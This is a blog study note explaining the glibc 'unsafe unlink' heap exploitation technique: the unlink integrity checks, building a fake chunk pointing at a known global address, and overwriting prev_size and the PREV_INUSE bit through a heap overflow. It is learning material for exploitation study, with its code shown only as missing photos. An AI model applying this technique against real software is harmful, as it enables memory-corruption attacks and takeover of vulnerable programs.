티스토리 뷰

System Study

unsafe unlink exploit [ Heap exploit ]

marshimaro aSiagaming 2017. 7. 10. 18:03

Unlink Check Routine


p->fd->bk == p

p->bk->fd == p            if not satisfied, it will send Error message( corrupted double-linked list )


And Check chunk Size.        ->        Next chunk's Prev size.

If size is not equal, message( corrupted size vs. prev_size" ) is thrown.



How to trigger unsafe unlink?


First, We have to know one global value.


ex)


uint64_t *v1;


int main(){

v1 = malloc(0x80);        // not fastbin

}



In this case, We can control v1 value which means we know v1's address.

If we well use it, we can overwrite anywhere, anythings.

To trigger unsafe unlink, We should find some heap overflow vuln, and overwrite next_chunk's prev_size, size( PREV_INUSE bit ).

If do so, we can make our fake_chunk, and unlink it.        ->        Trigger chunks Consolidation.



Below photo is unlink routine defined in glibc malloc.c




After bypassing few security check, BK->fd = FD is executed.

In 64bit context, my fake-chunk's fd should be (char *)&v1 - 24.

If you can't understand it, you should more study about structure pointer, and how to dereference structure pointer.





At first, I can't understand how to calculate prev_chunk pointer, and next_chunk pointer....

Answer is in glibc malloc.c -> Calculate chunk's pointer based on present Chunk's size, prev_size !.




How2heap's unsafeunlink.c is good.

But i want some make new code, so i make something new.

Below Code photo is my own code.





Very simmilar to how2heap example.

But if you want to understand more efficiently, make own your code.





Heap overflow vuln -> create fake chunk with global known address -> overwrite prev_size, size with PREV_INUSE bit of next_chunk



'System Study' 카테고리의 다른 글

File stream structure exploit  (0) 2017.07.14
HITCON Training sysmagic [ lab1 ]  (0) 2017.07.10
unsafe unlink exploit [ Heap exploit ]  (0) 2017.07.10
Analyze heap structure ( glibc malloc )  (0) 2017.07.09
x86 32bit system call convention  (0) 2017.07.07
GDB-PEDA 명령어  (0) 2017.07.07
댓글
댓글쓰기 폼